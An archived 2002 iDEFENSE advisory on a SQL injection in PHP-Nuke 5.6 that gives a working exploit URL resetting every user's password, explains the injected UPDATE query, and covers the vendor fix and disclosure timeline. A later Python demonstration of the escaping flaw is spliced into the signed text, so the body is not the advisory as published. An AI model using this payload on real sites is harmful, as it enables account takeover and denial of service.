
idefense.php-nuke.txt

Posted Nov 1, 2002
Authored by David Endler, Kill9 | Site idefense.com

iDEFENSE Security Advisory 10.31.2002c - PHP-Nuke v5.6 contains a SQL injection vulnerability which allows remote attackers to compromise other system accounts.

tags | remote, php, sql injection
SHA-256 | a3d04f97e2f31f8823e8e0cf99005677ccda51bd844d3419d9e572c3c01b74d9

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

iDEFENSE Security Advisory 10.31.02c:
http://www.idefense.com/advisory/10.31.02c.txt
PHP-Nuke SQL Injection Vulnerability
October 31, 2002

I. BACKGROUND

"PHP-Nuke is a news automated system specially designed to be used in
Intranets and Internet. The Administrator has total
control of his web site, registered users, and he will have in the
hand a powerful assembly of tools to maintain an active and 100%
interactive web site using databases." More information is available
at http://www.phpnuke.org.

II. DESCRIPTION

PHP-Nuke is susceptible to an SQL injection attack that allows an
attacker to modify the users table to his or her liking. Any
registered user of the target system can launch this attack by
feeding certain unfiltered characters to the account manager module.
The attacker can target a specific user or all system users at once.
The key is the ability to insert a backslash into the "bio" field,
thereby escaping a quote and leaving the SQL query open for
injection. The following example modifies every PHP-Nuke user's
password to "1":

Exploitation requires that the attacker log on, enter the account
manager and determine his or her UID through the source of the page.
If the attacker's UID is 2, he or she can then launch the attack by
requesting the following URL:

modules.php?name=Your_Account&op=saveuser&uid=2&bio=%5c&EditedMessage=
no&pass=xxxxx&vpass=xxxxx&newsletter=,+bio=0,+pass=md5(1)/*

The injected query is constructed as follows:

UPDATE nuke_users
SET name = '',
email = '',
femail = '',
url = 'http://',
pass = 'xxxxx',
+--[ bio = '\',
| user_avatar = '',
| user_icq = '',
| user_occ = '',
| user_from = '',
| user_intrest = '',
| user_sig = '',
| user_aim = '',
| user_yim = '',
| user_msnm = '',
+--[ newsletter = ',
bio=0,pass=md5(1)/*' WHERE uid='2'

The marked area is all treated as a single value to store into bio.
The "bio=0, pass=md5(1)" that follows it is then parsed as two real
assignments, and the "/*" comments out the WHERE clause, leaving an
update statement that sets the entire table (i.e., all users) to a
password of MD5(1).
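To make the mechanism above concrete from the defender's side, here is an added example (not code from the advisory or from PHP-Nuke) that rebuilds the UPDATE statement from the request shown above, scans it with MySQL's string-literal rules (backslash escapes the next character, '' is a literal quote, /* */ is a comment), and checks whether the WHERE clause is still live SQL. The `escape_quote_only` function is a hypothetical stand-in for a filter that handles quotes but not backslashes, which is the gap the advisory describes; `escape_mysql` applies the backslash-then-quote escaping that PHP's addslashes() and mysql_real_escape_string() perform. Column order and names are taken from the advisory's query; the `name` and `op` parameters are dropped because they select the module rather than populate the form.

```python
import re
from urllib.parse import parse_qs

# Columns in the order the advisory's UPDATE statement assigns them.
COLUMNS = ["name", "email", "femail", "url", "pass", "bio", "user_avatar",
           "user_icq", "user_occ", "user_from", "user_intrest", "user_sig",
           "user_aim", "user_yim", "user_msnm", "newsletter"]

# The request from the advisory, joined onto one line (constructed input).
REQUEST = ("name=Your_Account&op=saveuser&uid=2&bio=%5c&EditedMessage="
           "no&pass=xxxxx&vpass=xxxxx&newsletter=,+bio=0,+pass=md5(1)/*")


def escape_quote_only(value: str) -> str:
    """Hypothetical weak filter: neutralises the quote but leaves the
    backslash alone, which is the gap the advisory describes."""
    return value.replace("'", "\\'")


def escape_mysql(value: str) -> str:
    """What addslashes()/mysql_real_escape_string() do for these two
    characters: double the backslash first, then escape the quote."""
    return value.replace("\\", "\\\\").replace("'", "\\'")


def build_update(query_string: str, escape) -> str:
    """Rebuild the saveuser UPDATE the way the advisory prints it: every
    column value quoted and interpolated, then WHERE uid='<uid>'."""
    params = {k: v[0] for k, v in
              parse_qs(query_string, keep_blank_values=True).items()}
    params.pop("name", None)   # module selector, not the form's "name" field
    params.pop("op", None)
    values = {col: params.get(col, "") for col in COLUMNS}
    values["url"] = params.get("url", "http://")
    sets = ", ".join(f"{col} = '{escape(values[col])}'" for col in COLUMNS)
    uid = escape(params.get("uid", ""))
    return f"UPDATE nuke_users SET {sets} WHERE uid='{uid}'"


def tokenize(sql: str):
    """Scan the statement with MySQL's literal rules: inside '...' a
    backslash escapes the next character and '' stands for one quote;
    /* ... */ is a comment, and an unterminated one swallows the rest of
    the statement. Returns (code, literals): the SQL with each literal
    replaced by '?' and comments dropped, plus the decoded literals."""
    code, literals = [], []
    i, n = 0, len(sql)
    while i < n:
        if sql[i] == "'":
            i += 1
            buf = []
            while i < n:
                c = sql[i]
                if c == "\\" and i + 1 < n:                 # backslash escape
                    buf.append(sql[i + 1])
                    i += 2
                elif c == "'" and sql[i + 1:i + 2] == "'":  # doubled quote
                    buf.append("'")
                    i += 2
                elif c == "'":                              # closing quote
                    i += 1
                    break
                else:
                    buf.append(c)
                    i += 1
            literals.append("".join(buf))
            code.append("?")
        elif sql.startswith("/*", i):
            end = sql.find("*/", i + 2)
            i = n if end == -1 else end + 2
        else:
            code.append(sql[i])
            i += 1
    return "".join(code), literals


def where_survives(sql: str) -> bool:
    """True if a WHERE keyword is still live SQL, i.e. outside every
    literal and comment."""
    code, _ = tokenize(sql)
    return re.search(r"\bwhere\b", code, re.IGNORECASE) is not None


if __name__ == "__main__":
    for label, esc in (("quote-only escaping", escape_quote_only),
                       ("backslash+quote escaping", escape_mysql)):
        sql = build_update(REQUEST, esc)
        code, lits = tokenize(sql)
        print(f"{label}: {len(lits)} literals; live SQL: {code}")
        print("  WHERE clause intact:", where_survives(sql))
```

With the weak filter the scanner finds only six literals: the sixth runs from the bio field through every intervening `''` (read as an escaped quote) up to the opening quote of the newsletter value, exactly the bracketed region in the advisory's diagram, and the trailing `, bio=0, pass=md5(1)` is left as live SQL before the comment discards the WHERE clause. With backslash-aware escaping the bio literal closes after the single backslash, the newsletter payload stays inside its own literal, and the WHERE clause survives. Parameterised queries remove the problem entirely, since values never pass through the SQL tokenizer at all.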

III. ANALYSIS

Exploitation allows an attacker to compromise any other system
account, thereby gaining the privileges and identity of the
compromised account. The attacker can also corrupt the entire users
table, effectively denying service to legitimate users.

IV. DETECTION

iDEFENSE Labs successfully tested and exploited this vulnerability in
PHP-Nuke 5.6, Unix version. As the described exploit is dangerous in
nature, administrators should not test in a production environment.

V. VENDOR FIX

The author, Francisco Burzi, responded:

"PHP-Nuke version 6.0 is not vulnerable to the SQL injection
attack...

Latest version is 6.0 and 6.5 under development. Old versions don't
have support of any kind, all bugs and security fixes apply in the
new versions. So, the solution to this security hole is to update the
software from 5.6 to 6.0 version."

VI. CVE INFORMATION

The Mitre Corp.'s Common Vulnerabilities and Exposures (CVE) Project
has assigned the identification number CAN-2002-1242 to this issue.

VII. DISCLOSURE TIMELINE

09/17/2002 Issue disclosed to iDEFENSE
09/23/2002 Author notified through submission form
09/23/2002 iDEFENSE clients notified
10/01/2002 iDEFENSE second attempt at PHP-Nuke contact
10/20/2002 iDEFENSE third attempt at PHP-Nuke contact
10/31/2002 Response from Francisco Burzi
(nukelite@users.sourceforge.net)
10/31/2002 Coordinated Public Disclosure

VIII. CREDIT

kill9 (kill9@hackers.com) is credited with discovering this
vulnerability.



Get paid for security research
http://www.idefense.com/contributor.html

Subscribe to iDEFENSE Advisories:
send email to listserv@idefense.com, subject line: "subscribe"


About iDEFENSE:

iDEFENSE is a global security intelligence company that proactively
monitors sources throughout the world — from technical
vulnerabilities and hacker profiling to the global spread of viruses
and other malicious code. Our security intelligence services provide
decision-makers, frontline security professionals and network
administrators with timely access to actionable intelligence
and decision support on cyber-related threats. For more information,
visit http://www.idefense.com.


- -dave

David Endler, CISSP
Director, Technical Intelligence
iDEFENSE, Inc.
14151 Newbrook Drive
Suite 100
Chantilly, VA 20151
voice: 703-344-2632
fax: 703-961-1071

dendler@idefense.com
www.idefense.com

-----BEGIN PGP SIGNATURE-----
Version: PGP 7.1.2
Comment: http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x4B0ACC2A

iQA/AwUBPcHlgUrdNYRLCswqEQLGcwCdH27Ssm5+bhXyONfPn7uE+hk/gckAoOKJ
IbcubmZUdFwWk9wRDlyT3kFj
=FWej
-----END PGP SIGNATURE-----
